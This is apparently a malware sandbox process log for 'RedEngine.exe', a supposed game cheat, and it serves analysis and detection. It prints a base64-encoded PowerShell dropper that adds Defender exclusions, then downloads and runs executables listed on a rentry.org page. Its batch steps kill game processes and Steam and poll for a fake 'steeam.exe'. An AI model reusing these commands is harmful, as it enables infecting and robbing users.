"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5896

C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd0.exe
"C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd0.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5944

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\736D.tmp\736E.tmp\736F.bat C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd0.exe"
4⤵
PID:5824

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:3576

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:1996

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:6008

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:5272

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:5912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:5964

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:6032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:6028

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:5988

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5316

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:5940

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:6064

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6200

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:6404

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:5976

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5268

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:800

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:5312

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:2200

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:5160

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:5916

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5664

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:6396

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:6320

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5696

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:508

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:5312

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5792

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:3552

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:2936

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:6060

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6916

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:5156

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:6868

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:5272

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:6900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5132

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6184

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6208

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:460

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6360

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6332

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6788

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5612

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4436

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6468

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5692

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6416

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6420

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6916

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5552

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6168

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6160

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7256

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7296

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7304

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:8048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7448

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6412

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7508

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7636

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5128

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6916

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:1568

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6016

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:2624

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:8116

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7432

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7208

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7192

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7504

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6364

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7412

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8180

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:8028

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7520

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8016

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6824

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6376

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7352

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7400

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7728

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7976

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8116

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8068

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8064

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5696

C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd1.exe
"C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd1.exe"
3⤵
- Executes dropped EXE
PID:508

C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd2.exe
"C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd2.exe"
3⤵
- Executes dropped EXE
PID:4860

C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd3.exe
"C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5036

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7487.tmp\7488.tmp\7489.bat C:\Users\Admin\AppData\Roaming\cdvff4nc.wrd3.exe"
4⤵
PID:5796

C:\Windows\system32\where.exe
where node
5⤵
PID:5444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4060

C:\Users\Admin\Downloads\RedEngine\RedEngine.exe
"C:\Users\Admin\Downloads\RedEngine\RedEngine.exe"
1⤵
PID:2200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2608

C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp0.exe
"C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp0.exe"
3⤵
PID:7096

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\89A5.tmp\89A6.tmp\89A7.bat C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp0.exe"
4⤵
PID:6548

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:5884

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:7076

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:7124

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:6780

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:7048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:5676

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:7152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:5952

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:3908

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6772

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:4732

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:6540

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6580

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:6260

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:6204

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:908

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:6060

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:4944

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6496

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:7140

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:4044

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7144

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:6416

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:3544

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6496

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:6864

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:7140

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7576

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:7600

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:7536

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:4732

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7304

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:7488

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:6244

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:7656

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:7544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4316

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7332

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7940

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5220

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7952

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8152

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7392

C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp1.exe
"C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp1.exe"
3⤵
PID:6864

C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp2.exe
"C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp2.exe"
3⤵
PID:6944

C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp3.exe
"C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp3.exe"
3⤵
PID:7044

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8AAF.tmp\8AB0.tmp\8AB1.bat C:\Users\Admin\AppData\Roaming\kmxnbwsm.rmp3.exe"
4⤵
PID:6232

C:\Windows\system32\where.exe
where node
5⤵
PID:6564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:6888

C:\Users\Admin\Downloads\RedEngine\RedEngine.exe
"C:\Users\Admin\Downloads\RedEngine\RedEngine.exe"
1⤵
PID:4192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
